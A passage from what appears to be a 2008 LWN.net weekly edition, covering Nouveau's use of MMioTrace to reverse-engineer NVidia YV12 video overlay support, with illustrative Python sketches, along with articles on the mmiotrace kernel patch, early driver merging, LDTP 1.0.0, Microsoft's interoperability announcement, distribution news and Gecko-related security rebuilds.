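            raise ValueError("address outside the traced page")
        # 1. The page is not present, so the access faults; the handler
        #    notes the address and the attempted operation.
        pending = (op, addr)
        # 2. The handler marks the page present ...
        self.present = True
        # 3. ... and the faulting instruction is single-stepped.
        offset = addr - self.base
        if op == "W":
            self.registers[offset] = value
        else:
            value = self.registers.get(offset, 0)
        self.log.append(pending + (value,))
        # 4. The page is marked not present again for the next access.
        self.present = False
        return value

    def write(self, addr, value):
        self._access("W", addr, value)

    def read(self, addr):
        return self._access("R", addr)


if __name__ == "__main__":
    page = TracedPage(base=0x1000)
    page.write(0x1004, 0xAB)
    page.read(0x1004)
    for op, addr, value in page.log:
        print(op, hex(addr), hex(value))
```

Because the trap is re-armed after every access, each read and write produces
exactly one log entry, at the cost of a fault per access.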

MMioTrace has some restrictions on tracing into the legacy ISA address
range, as marking those pages not present crashes the kernel. A solution to
this may be forthcoming but would require patching the kernel.

MMioTrace is usable for all types of drivers running in the kernel, not
just graphics drivers.  It is not shipped with the kernel as of yet; it
worked as an external module up to 2.6.23.  However, 2.6.24 has seen
the removal of certain features, which means that MMioTrace will need to be
upstreamed for it to work with 2.6.25 or later kernels.

If you are interested in more details, you should have a look at the 
MMioTrace page.

valgrind-mmt

Valgrind-mmt is a plugin for the valgrind debugging suite. It traces MMIO
accesses from a user-space process (like the X.org server) where the NVidia
DDX code
is loaded. This was originally written by Dave Airlie for tracing ATI
hardware and has since been extended by a number of other developers.  It is used in
Nouveau in a way similar to renouveau: to dump the contents of a FIFO.
Valgrind-mmt allows reliably tracing the X.org FIFO, which is something
renouveau cannot do very well. Tracing the X.org FIFO is sometimes required
as it is the only way to see how some 2D features are implemented.

Using MMioTrace to implement a new feature

Commands are usually sent to the card by writing in the command FIFO, not
by touching registers directly.   But initialization of the card (including
notably mode setting), as well as some other operations, are done via MMIO
operations from within the kernel.

Below is an example of how MMioTrace was used to reverse engineer the YV12
video overlay that is present in some NVidia cards.


Video formats

Videos are usually not encoded in the RGB colorspace. Most video codecs
work in the YUV colorspace instead, where Y stands for luminance (black and
white image), and U and V represent the chrominance (i.e. color). Since the
eye is more sensitive to luminance than to chrominance, codecs usually drop
a fraction of the U and V samples in order to save space. When the card is
asked through
e.g. X-Video to display a video frame, it is passed a buffer containing YUV
data, usually in YV12 or YUY2 format. 

FourCC.org can give you details about
those formats, but for 
the purposes of this article, we will just say that YUY2 is a format that
keeps one chrominance sample (alternately U or V) per luminance sample,
thus giving "YUYVYUYV" to the card (16 bits per pixel), and YV12 is a format that
keeps two chrominance samples (one U, one V) per 2x2 luminance block, which
gives an effective 12 bits per pixel of video. YV12 is 25% smaller than
YUY2 and is the format used by most popular codecs. Your author has yet to
find any movie codec that does not output YV12 (or I420, which is
conceptually the same; it just swaps the position of U and V in the
buffer).
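
The sizes are easy to check with a little arithmetic, here as a small Python
sketch.  It assumes 8-bit samples and even frame dimensions; the function
names and the 720x576 frame are chosen purely for illustration.

```python
def yuy2_bytes(width, height):
    """Packed YUYV: two pixels share one U and one V, so 4 bytes per 2 pixels."""
    return width * height * 2


def yv12_bytes(width, height):
    """Planar: a full Y plane plus U and V planes subsampled 2x2."""
    if width % 2 or height % 2:
        raise ValueError("this sketch assumes even dimensions")
    luma = width * height
    chroma = (width // 2) * (height // 2)
    return luma + 2 * chroma


def bits_per_pixel(total_bytes, width, height):
    """Average number of bits used per displayed pixel."""
    return total_bytes * 8 / (width * height)


if __name__ == "__main__":
    w, h = 720, 576  # an arbitrary example frame size
    packed, planar = yuy2_bytes(w, h), yv12_bytes(w, h)
    print("YUY2:", packed, "bytes,", bits_per_pixel(packed, w, h), "bpp")
    print("YV12:", planar, "bytes,", bits_per_pixel(planar, w, h), "bpp")
    print("YV12 / YUY2 =", planar / packed)
```

For any even frame size the ratio comes out at 0.75, which is where the 25%
figure comes from.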


Some months ago, Nouveau's Xv implementation was inherited
from nv. Besides being extremely slow, nv supported only the YUY2 format, and
converted YV12 input to YUY2 in software before uploading the data to the
card. While working on improving performance, we quickly came to wonder if
NVidia cards supported YV12 in hardware. Due to the 25% size reduction,
this would naturally decrease the volume of bus transfers, which plays a
very important role in Xv throughput especially on PCI cards.

We verified that by running performance tests on the NVidia binary driver,
playing YV12 and YUY2 videos (using mplayer's -yuy2 option). Our performance
tests consisted simply of mplayer's "benchmark" mode. The results were
extremely clear: the operation required just over 20 seconds in YUY2 mode, and
just over 15 seconds in YV12 mode.
There is no need to reach for your calculator: it is a 25% difference, which
matches the difference in data size exactly. The most obvious explanation is
that the data is sent to the hardware in YV12 format.

So the situation was: we had an Xv driver that handled YUY2 video only, we
knew (or thought, with a high degree of confidence and hope) that the
hardware supported YV12, but no existing driver like rivatv had code for
it. Some reverse engineering had to take place.

MMioTrace doesn't enter the arena just now, however. As mentioned above,
most of the time, commands are sent to the card by writing to the command
FIFO, and not by touching registers. So we first checked the X command FIFO
using valgrind-mmt and found some commands related to video.

However, it quickly turned out that those were software methods, that is to
say, dummy methods that make the card generate an interrupt asking for the
kernel to handle it.  It's somewhat similar to an ioctl() call into the
kernel module, except that it's in sync with the FIFO. First lesson
learned: Video overlay setup is being done by the kernel module.

We then MMioTraced the NVidia binary driver, playing YUY2 and YV12 video
(same dimensions, window position, ... - the only thing that differed was
the format), and compared the outputs. And among the 150 kilobytes of resulting data,
we found (for YUY2 mode):


While for YV12 mode:


So here we had a different value being written into FORMAT, and three
unknown registers. From a reading of existing documentation and code, it turned out
that bit 0 of FORMAT was previously unknown to us.
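
The comparison itself is mechanical, and can be sketched in Python.  Nothing
below reproduces MMioTrace's real output format or the actual trace: a trace
is assumed to be a list of (operation, register, value) tuples, and every
register name and value other than the name FORMAT is made up for the
example.

```python
def written_values(trace):
    """Collect, per register, the list of values written during a trace."""
    writes = {}
    for op, reg, value in trace:
        if op == "W":
            writes.setdefault(reg, []).append(value)
    return writes


def compare_traces(trace_a, trace_b):
    """Return (registers written with different values, registers only in b)."""
    a, b = written_values(trace_a), written_values(trace_b)
    differing = sorted(reg for reg in a.keys() & b.keys() if a[reg] != b[reg])
    only_in_b = sorted(b.keys() - a.keys())
    return differing, only_in_b


if __name__ == "__main__":
    # Made-up traces, NOT taken from the NVidia driver.
    yuy2_trace = [("W", "SIZE", 0x1), ("W", "FORMAT", 0x10), ("R", "STATUS", 0x0)]
    yv12_trace = [("W", "SIZE", 0x1), ("W", "FORMAT", 0x11),
                  ("W", "UNKNOWN_1", 0x5), ("R", "STATUS", 0x0)]
    differing, only_in_yv12 = compare_traces(yuy2_trace, yv12_trace)
    print("different values:", differing)
    print("written only in the second trace:", only_in_yv12)
```

Keeping everything but the video format identical between the two runs is
what makes such a comparison useful: whatever remains after the common writes
are discarded is a candidate for the feature under study.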

Next we tried to get the feature to work in our driver.  We tried it
without touching the three unknown registers, and got no video at all. So it had
an effect, but we weren't sure if it really was the "YV12 format"
bit. Further looking into MMioTraces showed that what was written into the
three registers was in fact fairly similar to what was done for the image
buffer setup, and we were able to make an educated guess at what was
supposed to be written here. (It was the set up of the color buffer, while
the "main" buffer was used for luminance data.)

In the end, we got YV12 to work in Nouveau's Xv without converting to YUY2,
which represented an increase in performance of (about) the expected 25%.
MMioTrace enabled us to discover how the card needed to be programmed to do
YV12 in hardware, which was apparently known by nobody outside of NVidia
before.

This knowledge ended up in nv_video.c in NVPutOverlayImage:


It is interesting to note that MMioTrace simply records all register reads
and writes - you can see almost everything that the kernel module does to
the card.  The downside to "almost everything" is that the saved data set
gets large fast.  Reducing the trace range and using it only for short
periods of time helps a bit but, still, after a few minutes of mmiotracing,
you will get into the megabyte range for your logs. Sifting through those
thousands of lines to find what one is looking for takes some time to get
used to.

We used MMioTrace to reverse-engineer YV12 overlay, but we also used it to 
reverse-engineer a very large part of card initialization code and
mode setting - and it will most certainly be useful for many other things that
involve a kernel module.
It is not limited to Nouveau, and is able to trace MMIO operations from any
of your (binary) kernel modules, thereby allowing reverse-engineering of
drivers for other hardware.

Current development in Unix graphics and its influence on Nouveau

We'll now take a peek into the future of 3D acceleration on Linux.  2007
saw a number of major changes in how Linux and X11 handle
graphics. A lot of improvements are coming into use: EXA for 2D
acceleration, TTM for memory
management, Gallium3D for 3D, the new DRI2 
interface, etc.  All this needs driver-side changes, which can take some time
to be done.

With the advent of programmable graphics hardware, the old graphics driver
model in Mesa became unsuitable. The current Mesa model is designed for
cards which are based around OpenGL fixed-function
operations. Fixed-function cards have hardware blocks designed for each part
of the GL pipeline. The driver model for this requires each new piece of
fixed functionality to call into the driver, which can get complex. This
also causes a lot of code to be duplicated in each driver.

A new driver model, called Gallium3D, tries to simplify the driver
interface and increase the amount of shared code. It is designed to cater
for OpenGL 3.0's needs as well as current OpenGL and DirectX APIs. It is
also designed to allow portable drivers across all major platforms/OSes. It
assumes programmable graphics hardware with, at least, fragment shaders.

Now that we know why the design was changed, let's have a look at the
architecture of Gallium3D. Gallium3D splits the DRI driver into three major
components: the common "state tracker", the OS-dependent "winsys" layer, and
the hardware-specific 3D driver.
The winsys is in charge of 2D action and most of the housekeeping and
OS-specific bits, while the hardware driver does the 3D. Each driver needs
to implement a hardware driver and a winsys part. If an existing driver
gets ported to another OS, only the winsys part needs to be redone.
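
The division of labor can be illustrated with a deliberately tiny Python
model.  It is not the Gallium3D API: all class and method names here are
invented, and the "rendering" only copies bytes around.  The point is just
that the state tracker and the hardware driver stay untouched when the winsys
is swapped.

```python
class LinuxWinsys:
    """OS-dependent part: buffer housekeeping and getting results on screen."""
    name = "linux"

    def allocate(self, size):
        return bytearray(size)

    def present(self, buffer):
        return f"{self.name}: presented {len(buffer)} bytes"


class OtherOsWinsys:
    """The only part that has to be rewritten for a port to another OS."""
    name = "other-os"

    def allocate(self, size):
        return bytearray(size)

    def present(self, buffer):
        return f"{self.name}: presented {len(buffer)} bytes"


class HardwareDriver:
    """Hardware-specific 3D part; reaches the OS only through the winsys."""

    def __init__(self, winsys):
        self.winsys = winsys

    def render(self, commands):
        buffer = self.winsys.allocate(len(commands))
        for i, command in enumerate(commands):
            buffer[i] = command & 0xFF  # stand-in for real command encoding
        return self.winsys.present(buffer)


class StateTracker:
    """Common part shared by all drivers: queues API calls for the driver."""

    def __init__(self, driver):
        self.driver = driver
        self.pending = []

    def draw(self, primitive_id):
        self.pending.append(primitive_id)

    def flush(self):
        result = self.driver.render(self.pending)
        self.pending = []
        return result


if __name__ == "__main__":
    for winsys in (LinuxWinsys(), OtherOsWinsys()):
        tracker = StateTracker(HardwareDriver(winsys))
        tracker.draw(1)
        tracker.draw(2)
        print(tracker.flush())
```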

There is also a fully working reference software 3D driver called softpipe. 
It is a software renderer showing the Gallium3D concepts and how to implement 
them, which also acts as a software fallback driver for things the hardware
cannot handle.

Another component of the new graphics subsystem is the TTM based memory
manager. TTM is a unified in-kernel manager for all GPU accessible memory.
Previous memory management was split between X drivers, mostly using static
allocations. TTM was originally designed and implemented for Intel
hardware, and had to be adapted to handle NVidia hardware and Nouveau
software design. The main feature added to TTM was called fence classing,
which was required to support NVidia's multiple hardware contexts.

Current Status

When we shifted work from reverse engineering to driver development last
year, we were asked when a driver would be ready. We predicted late 2007,
but we only got part of the work done.

Except for NV5x cards, we basically have a good-to-reasonably-well working
2D driver. Releasing an official "2D" driver was considered but, at this
point, the kernel interfaces are not considered stable enough to support
for the long term. When a DRM kernel module is shipped in Linus's kernel, the
interfaces are required to be supported indefinitely. This would be unwise
for Nouveau as the interface is evolving to accommodate changes for TTM and
mode setting, and supporting old interfaces may place hard-to-support
requirements on newer ones.

Currently, Nouveau can claim:

 basic 2D rendering on all cards (through EXA)
 EXA composite (implementing the XRENDER extension) works via the 3D engine on 
   all cards except NV5x and NV04. In the case of NV04, hardware limitations
   make a composite implementation difficult if not impossible.
   NV1x was just recently completed, which was a major feat as
   these cards only have two fixed function register combiners and no shaders
 Xv from NV04 up to NV4x thanks to the work of Arthur Huillet.
   Depending on the hardware, this uses either the blitter (on NV4->NV4x), the overlay (on NV4->NV30) or a video texture (on NV40).
   Xv performance is on par with that of the nvidia binary driver on some cards.
 PPC support:
   at least some PPC based systems work. Most endian-based problems
   are solved thanks to the help of the PS3 RSX project and Ben Herrenschmidt. However,
   some systems are exhibiting DMA hangs when trying to do uploads to the
   card. The code is currently being audited and most of the PPC bugs have been fixed.
 xrandr 1.2 support is being worked on; basic mode setting should mostly work
   on NV3x, NV4x and NV5x cards. More sophisticated features, like dual head
   support, are actively being worked on and progress is fast.
 the Nouveau specific DRM code has some preliminary work done for TTM. e.g.
   we have one FIFO allocated for DRM use only. However, a fair amount of work
   is left until we have something really useful there.
 Ben Skeggs is working on a Gallium3D driver for NV4x and NV5x. This driver does 
   work for NV4x but is neither feature complete nor bug free. NV5x does not work 
   currently.
 Stephane is working on supporting shaderless cards with Gallium3D. That would
   be a generic framework which, in case of NVidia cards, could support 
   shader instructions on cards ≥NV04 and <NV30. This framework is not specifically
   designed for NVidia cards but should help older ATI/Intel cards too.


The weak spot is currently the NV50. On these cards, 2D is working the same
as nv but saving and restoring the console / virtual terminal state doesn't
work.

All that is nice and somewhat important to have, but I hear you ask "what
about 3D"?  The short answer is: We don't have 3D working.  The longer
answer is: NV5x doesn't work and needs more reverse engineering as a lot
has changed from NV4x. For all other cards the needed information is
available but there are many pieces in the puzzle to build a final driver.

As a proof of concept, glxgears works on NV1x, NV3x and NV4x but with some
glitches.  However, work on the Mesa DRI driver has ceased in order to
target Gallium3D.
A somewhat working Gallium3D driver exists with many bugs and glitches.
The NV4x is getting better every day but isn't usable for games
yet. Gallium3D itself is still a work in progress and the same holds true
for our Gallium3D driver.

Currently, a fair amount of work is going on in the mode setting field, with
Maarten Maathuis and Stuart Bennett enhancing this part of the code. This
leads to RandR1.2 (dual head) support in Nouveau. Once this is done, we
plan to move it into kernel land, following the other drivers. A kernel API
has been defined for that purpose.  Basically, this API looks like a
simplified RandR1.2 API, which should make porting easy.

So what is coming next?
This is only a rough outlook of what we want to do mid term:


 Finish 2D work, which includes mode setting and RandR1.2.
 Do more reverse engineering for NV5x cards.
 Implement TTM support.
 Implement Gallium3D drivers. This one is obvious for the cards with
   shaders. However, as Gallium3D expects shaders, older cards are left out in the cold
   unless Stephane gets his framework working.
   In case the framework isn't feasible, a DRI driver for older cards may be
   the only option.


By the way: If you are interested in more details, please have a look at
our Wiki and TiNDC ("The Irregular Nouveau Development Companions") or join
us in #nouveau on freenode (logs are available).

So, to keep with tradition, let's have some screenshots.   Here's a shot of Neverball running under the
Nouveau driver:


And OpenArena with a Nouveau Gallium3D build from January 2008 
displays this:


It seems the weapon is a bit too dark but otherwise we couldn't find obvious 
differences.

Further information about Gallium3D can be found on the
Tungsten Graphics site.

Conclusion

So that is our current status. Our roadmap shows that the next milestone would be 
Quake, which is not so far away on NV4x but which has some problems to overcome on
the other cards. Our first estimate of Autumn / Winter 2007 held up well for 
the 2D part but, as we detailed earlier, was somewhat delayed due to decisions
out of our control like TTM and Gallium. However, the decision was the right
one as Nouveau will be one of the most advanced and future-proof drivers
available.

And finally:
I would like to take this opportunity to thank Arthur Huillet, Ben Skeggs, 
David Airlie and Stephane Marchesin for their great help on this article. It 
definitely was a team effort!

		Tracing memory-mapped I/O operations


Device drivers, in the end, usually do one thing: they communicate with the
hardware by way of a set of memory-mapped I/O (MMIO) registers.  So when
one is trying to figure out what a driver is doing - for debugging
purposes, perhaps - it is often interesting to look at the sequence of MMIO
operations the driver performs.  If one is trying to reverse-engineer a
driver which is available only in binary form, watching what is done with
MMIO registers may be the only way to figure out how the hardware works.
To this end, the developers behind the Nouveau project developed a tool
called "mmiotrace" which helps them to watch what is going on with
memory-mapped I/O.  Now that tool is being fixed up and pushed toward the
mainline.

Drivers gain access to MMIO regions with ioremap() (or one of the
higher-level functions like pci_iomap()), so that is the logical
place to hook in a tracing infrastructure.  So the current mmiotrace patch adds
some new variants of ioremap():


These functions perform like ioremap() and
ioremap_nocache(), in that they return an I/O memory pointer which
can be used by the driver to get at MMIO space.  What goes on internally,
though, is quite different.

On the x86 architecture (as with most others), I/O memory space is accessed
with memory operations through the page tables in the usual way, so ioremap() just
returns an address which maps onto the desired physical space.  The tracing
versions, though, take the extra step of marking the pages within the I/O
region as not being present in the system; as a result, whenever code
attempts to access that space, a page fault will be generated.

Normally, page faults incurred when running in kernel mode will cause a kernel
oops.  There are exceptions, though; the functions which copy data between
user and kernel space are one example.  The mmiotrace patch adds another
exception which tests faulting addresses against the MMIO region(s) being
traced.  Should the address indicate that an MMIO access is being
attempted, the mmiotrace code will:


 Mark the relevant page as being present in memory.

 Set the TF (trace) bit in the faulting thread's processor state mask.

 Invoke a "pre" handler provided by higher-level tracing code.

 Indicate that the fault has been handled and return to the faulting
code.


Once all this has happened, the instruction which originally caused the
page fault will be rerun, successfully this time.  But the setting of the
trace bit will cause a new processor trap after that instruction has been
executed.  At that point, the page is marked unavailable once again,
the trace bit is reset (assuming it wasn't set elsewhere), the tracing
layer's "post" handler is called, and life continues as normal until the
next fault happens.
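
The fault-and-retrap cycle described above can be modeled in a few lines of
user-space Python.  This is only a toy sketch, not the mmiotrace code: the
class and method names are invented for illustration, a single boolean
stands in for the page's "present" bit, and another stands in for the
processor's trace bit.

```python
class TracedMMIO:
    """Toy model of one traced MMIO page (illustration only, not kernel code)."""

    def __init__(self, nregs):
        self.regs = [0] * nregs    # stands in for the device's registers
        self.present = False       # the tracing mapping starts out "not present"
        self.trap_flag = False     # stands in for the TF (trace) bit
        self.log = []              # records made by the "pre" and "post" handlers

    def _page_fault(self, op, offset, value):
        self.present = True                            # mark the page present
        self.trap_flag = True                          # ask for a trap after one instruction
        self.log.append(("pre", op, offset, value))    # "pre" handler
        # returning from here lets the faulting instruction run again

    def _single_step_trap(self, op, offset, value):
        self.present = False                           # hide the page once more
        self.trap_flag = False                         # reset the trace bit
        self.log.append(("post", op, offset, value))   # "post" handler

    def _execute(self, op, offset, value=None):
        if not self.present:
            self._page_fault(op, offset, value)
        if op == "write":
            self.regs[offset] = value
        result = self.regs[offset]
        if self.trap_flag:
            self._single_step_trap(op, offset, result)
        return result

    def write(self, offset, value):
        self._execute("write", offset, value)

    def read(self, offset):
        return self._execute("read", offset)


dev = TracedMMIO(4)
dev.write(2, 0xAB)
print(dev.read(2))
for entry in dev.log:
    print(entry)
```

Note that, in this model, the value of a read is only known to the "post"
handler, since the instruction has not yet run when the "pre" handler is
called.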


The tracing layer really only has one task: figure out what the code was
trying to do in MMIO space and log the action by way of the relay
interface.  Figuring things out means learning enough about the instruction
which caused the page fault to determine which address was being accessed,
whether a read or write was being performed, the size of the data being
transferred, and the actual value read or written.  So there is a certain
amount of architecture-specific instruction grubbing code involved, which,
for the current patch, is only provided for x86 machines.


Since tracing is enabled by calling a special version of
ioremap(), it is not possible to trace a driver module without
making changes to its source and rebuilding it.  That might seem like a strange requirement
for a tool meant to help with reverse engineering (among other things).
The driver being studied by the Nouveau project uses a GPL-licensed shim to
link into the kernel, so making modifications in that case was not a hard
thing to do.  A more general solution may eventually need to be found,
though, for situations where that sort of glue layer is not present.


Beyond that, this patch is likely to go through a number of changes before
it finds its way into the mainline.  Reviewers have found a number of
things which need fixing, and there are a few too many places in the code
where the comments say (literally) "if this happens, all hell breaks loose."  It also
seems likely that mmiotrace will be merged with the recently-posted ftrace tracing mechanism.  There is time to
get this work done before the 2.6.26 merge window opens, but the mmiotrace
hackers will need to keep the work moving forward.

		Merging drivers early


Drivers tend to be a world unto themselves, with bugs only affecting a
subset—often a tiny subset—of kernel users.  Until a driver
gets merged into the kernel, though, anyone wishing to test it, or help clean it
up, has to jump through some hoops.  To help reduce those barriers,
Linus Torvalds and others have been advocating early merging of drivers:
getting them into the kernel and incrementally improving them from there.


This policy of early merging of drivers is not universally embraced, with a
recent remote DMA (RDMA) ethernet driver, which lives in the infiniband
tree, getting singled
out.  Based on the problems he observed in the driver, Adrian Bunk asked: "Is it really intended to merge
drivers without _any_ kind of review?"  This was, perhaps, an overly
dramatic question as the driver has undergone review, but not all of the
changes have been reflected in the mainline version.  There is
still work to do, as Infiniband maintainer Roland Dreier points out:

Just to be clear, this driver was reviewed.  Many issues were found,
and many were fixed while others are being worked on.


It's a judgment call when to merge things, but in this case given the
good engagement from the vendor, I didn't see anything to be gained by
delaying the merge.


It is a sentiment shared by other kernel hackers as well.  When there is a
developer who is responding to the feedback along with a working driver,
getting it into the mainline kernel—where more eyes can scrutinize
it—is seen as a positive step.  Torvalds is very interested in seeing
drivers earlier so that more collaboration can happen:

I'd really rather have the driver merged, and then *other* people can send 
patches!

The thing is, that's what merging really means - people can work on it 
sanely together. Before it's merged, it's a lot harder for people to work 
on it unless they are really serious about that driver, so before 
merging, the janitorial kind of things seldom happen.


Other maintainers explained their criteria for accepting drivers that are
not quite up to usual kernel standards.  The consensus seems to be that
drivers with the following characteristics are acceptable:

compiles and seems to work
has no obvious security holes
has an active maintainer
does not affect people who don't have the hardware
does not introduce unnecessary or not fully thought out user space interfaces


There is little in the way of a downside to making drivers available
earlier.  Since they are self-contained, they generally don't cause problems
elsewhere in the kernel.  As long as reviewers are keeping an eye out for
security problems, which could lead to an unsuspecting user's box being
compromised, there are not many ways for a driver to negatively impact the
kernel as a whole.
User space interfaces via ioctl(), sysfs, or other means also need
to be closely examined as they will have to be maintained as part of
the kernel interface.


Along the way, much grumbling was heard about checkpatch, the Perl
script that complains about various stylistic problems with a patch.
Notably absent from the list above is any kind of requirement that
checkpatch errors or warnings be handled.
The
main complaint against checkpatch is its checks for line length; the resulting
"fixes" to kernel source sometimes leave much to be desired.  While it is generally agreed that too many
overly long lines can result in code that is difficult to read, exactly
what constitutes such a line tends to be an aesthetic judgment.
Slavish adherence to a fixed number of characters on a line in order to appease
checkpatch is clearly seen as a problem.


To some, this makes checkpatch less than useful, bordering on dangerous to
readability.  Torvalds stated that he has considered removing it from
the kernel tree on more than one occasion.  Human judgment is required to
interpret the warnings from checkpatch and sometimes it is not
being applied.  On the other hand, Ingo Molnar gives an impassioned defense of the tool:

Based on this first hand experience, my opinion about checkpatch has 
changed, rather radically: i now believe that checkpatch is almost as 
important to the long term health of our kernel development process as 
BitKeeper/Git turned out to be. If i had to stop using it today, it 
would be almost as bad of a step backwards to me as if we had to migrate 
the kernel source code control to CVS.


Molnar goes on to outline the pros and cons of checkpatch, all of which
stands in stark contrast to some of his earlier
complaints about the tool.


For most drivers, the path into the
kernel has been made a lot easier.  This will have the effect of
getting working, or mostly working, drivers into the hands of users more
quickly. More importantly, it will also get the code into the hands of the Linux kernel
community faster.  The likely result is a fully working, cleanly
coded driver sooner than it might have happened in the past.  An already
quick turnaround for hardware support in Linux may have just gotten faster.


		The Linux Desktop Testing Project reaches the 1.0.0 release


The 
Linux Desktop Testing Project
is a cross-UNIX GUI testing framework.
The project was started in 2005.
In the Linux world, LDTP originally just supported the GNOME desktop
environment.
KDE support was planned from the beginning; this capability is
now in place with the recently released KDE 4.0.
In addition to operating with the two major Linux desktops,
LDTP is being used by Mozilla and OpenOffice.org.
From the LDTP home page:


Linux Desktop (GUI Application) Testing Project (LDTP) is aimed at producing high quality test automation framework and cutting-edge tools that can be used to test Linux Desktop and improve it. It uses the Accessibility libraries to poke through the application's user interface. The framework also has tools to record test-cases based on user-selection on the application. LDTP is a Linux / Unix GUI application testing tool. It runs on Linux / Solaris / FreeBSD / Embedded environment (Palm source).


Version 0.8 of LDTP was investigated last February on LWN; take a look
to get an overview of the software's operation.
LDTP version 0.9.0 was released in August 2007; it featured new Firefox
automation support and bug fixes.
This week, version 1.0.0 was announced:


This release features
number of important breakthroughs in LDTP as well as in the field of Test
Automation. This release note covers a brief introduction on LDTP followed
by the list of new features and major bug fixes which makes this new version
of LDTP the best of the breed. Useful references have been included at the
end of this article for those who wish to hack / use LDTP.

New features in this release include the
Object Oriented LDTP, the LDTP Editor with record and replay
functionality, major bug fixes and lots of work on the documentation.
The Linux Desktop Testing Project is maturing and its scope is
getting wider.


LDTP can become an important tool for automated
testing of GUI-based applications.  With a bit of effort on the
part of developers, LDTP can improve the quality of applications
and speed up the testing of new releases.


		Interoperating with Microsoft


Last week, with much fanfare, Microsoft announced
a change in its practices in order to "expand interoperability".  It is a
rather sizable shift away from some of its previous inflammatory statements about free
software—though it scrupulously avoids that term—but whether it is the harbinger of a more open Microsoft, or yet another
empty pronouncement, is still unclear.  It does contain things of interest to the
community, in particular the patent enumeration, but there are
pitfalls as well.


The largest chunk of what Microsoft promises is documentation for APIs and
protocols used by some of their most popular products.  They immediately
released some 30,000 pages of Windows protocol specifications, much of
which the
Samba project
had to pay to access last December.  In addition, they will be
releasing documentation suitable for developers wishing to interoperate
with "Windows Vista (including 
the .NET Framework), Windows Server 2008, SQL Server 2008, Office 2007,
Exchange Server 2007, and Office SharePoint Server 2007, and future
versions of all these products."  


Microsoft has also promised to list which of the documented protocols are
covered by one of its patents or patent applications.  We may finally start
to get a handle on the infamous "235 patents" that Linux and free software
supposedly infringe.  These patents will be available for license on the
standard 
"reasonable and non-discriminatory" (RAND) terms, with an interesting
addition: "low royalty rates".  The patent list is not yet available, but
may be of use in ways that Microsoft does not intend: invalidating some of
the patents with prior art, for example.


As Microsoft is well aware, RAND terms are a non-starter for free
software because they restrict redistribution of the code.
The company has tried to soften that blow, perhaps, by rehashing its 
"covenant not to sue" developers that originated as part of the Novell
interoperability agreement.  The covenant may be a great public relations
ploy, but does little to alleviate concerns that free software developers
will have in implementing patented protocols.  It is the rare developer who
finds an itch to develop code to talk to Microsoft servers and who has no thought
of using or distributing it commercially.


There are also provisions in the announcement for documentation of
Microsoft implementations of industry standards.  A cynic might wonder why
additional information is needed; they are, after all, supposed to be
standards.  The unfortunate reality is that Microsoft does extend
such standards for its own purposes in incompatible ways; having that
kind of information can only help web browsers, directory services, and
other multi-platform tools. 


For a company as adamantly opposed to Open Document Format (ODF) as it
claims to be, it is a bit surprising to see that they plan changes to
Microsoft Office to "promote user choice among document formats".  APIs for
document format plug-ins along with the ability for users to make their own
choice about the default save format will be added.  How reasonable those
APIs are and how faithfully they can encapsulate Office documents will be
an interesting test of both Microsoft's sincerity and ODF's capabilities.
It is also a pretty clear attempt to at least appear to be playing nicely with ODF
while its competing OOXML format is being considered for an ISO standard.


There are also various platitudes about "opening dialogs" and "expanding
outreach" with the community included in the announcement.  It will be interesting to see how
that actually plays out.  It would, however, have been hard to imagine, even a year ago,
seeing a posting on a Microsoft-sponsored site entitled "How
open source has influenced Windows Server 2008".  In less than seven years, we
have moved from being a "cancer" to influencing its flagship products.


One obvious conclusion that can be drawn from this and other Microsoft
initiatives is that it is feeling a fair amount of pressure from
customers, the European Union, standards groups, and free software.  These kinds of
changes, even if they don't go as far as the rhetoric would lead one to
believe, are a pretty substantial shift in Microsoft culture and thinking.
Unfortunately, they do also seem to be angling for the long-sought "Linux
tax"—a payment, even just a small one, for each and every Linux deployment.


So far, Microsoft doesn't seem to have caught on to the idea that most Linux
installations are free in both senses of the term.  There is no
per-installation, per-processor, per-core licensing stream to tap into.
One of the headaches that free software users avoid is keeping track of all
those licenses, enforced by the ever-present threat of a Business Software
Alliance audit.  Microsoft has, to a limited extent, already tapped into (and
likely tapped out) that
revenue through the deals with Novell and other distributors.


Overall, this seems like a positive step.  It clearly acknowledges the role
that free software (or open source if you prefer) is playing in both the
commercial marketplace and the marketplace of ideas.  The actual
effects of this announcement for our community may be small, but it may
also be indicative of Microsoft moving in a more cooperative direction.  That
would be a rather nice thing to see.


		A brief look at some distribution news


In the process of reading through a number of distribution mailing lists,
your editor encountered several items that seemed worthy of mention, but
none that seemed to provide enough for a complete article.  So the
following will be a brief look at a variety of topics.

The Fedora Bug
Zappers subproject was recently
announced on the fedora-devel mailing list.  This is a team of people
who triage bugs and act as a bridge between the users and developers.  The
team is meeting regularly, and new bug zappers are always welcome.

Donnie Berkholz ran an informal survey that was answered by 50 Gentoo
developers.  The results have been graphed, one page per question.  For
example, the question "What are the top 3 issues facing
Gentoo?" is here.
"Developers' top 5 issues are manpower, publicity, goals, developer
friction, and leadership."  The pie chart shown on the previous page
has been replaced by a bar chart.  There
are eight more questions that remain to be charted.

The openSUSE project has been discussing
the creation of a developer blog.  Although other blogs exist they tend to
range off-topic.  This would be specifically a place to talk about
development topics, such as new features in YaST.  Posts would be tagged so
that people who wanted to find more about YaST could find all entries with
that tag.

Ubuntu wants all users to be involved with bug squashing.  Do 5 a day - every day!, says Daniel Holbach.

What you can do? That's up to you, your interests and your abilities.
 - If you're a developer, you can help out reviewing patches and getting
them uploaded.
 - If you want to just confirm new bugs, you can do that.
 - If you have experience with a certain package and want to triage bugs
you can do that and forward them upstream if necessary.
 - If you know your way around Ubuntu quite well, you can help assign
bugs to the right package.


That's not a bad idea, regardless of your distribution of choice.

		Cascading security updates


When following the distributions' security updates on a daily basis, as we
do at LWN, certain days are more work than others.  Two weeks ago we had a
rather full update with no
fewer than 28 packages updated for Fedora (most of those for both F7 and
F8), along with a handful of updates from other distributions.  It turns
out that the majority of the Fedora updates had a single cause: a set
of serious vulnerabilities in Mozilla Firefox.  


How does a single update to an application ripple so far that more than a
dozen packages have to be rebuilt?  One would think there would be shared
libraries that would get updated, with applications picking up those
changes the next time they are run.  That is, in theory, how things are
supposed to work, but in this case, the underlying libraries have no fixed application
binary interface (ABI).  So, changes to those libraries require any
applications that use them to be rebuilt and retested.


Gecko is the rendering engine used by Mozilla in their products to display
HTML.  Various other packages have started using it as well because of its
speed and standards compliance. Because Mozilla sometimes breaks
the ABI between releases, even minor releases, distributions may be stuck
rebuilding those applications when a new version of the library is
released.  Normally, that only happens when packaging a new version of the
distribution—or when serious security flaws are found. 


Mozilla's solution for this problem is XULRunner, which
will provide a stable ABI for applications.  As XULRunner and its companion
libxul become more widely available, the applications that
currently link to the Gecko libraries will presumably switch to avoid these
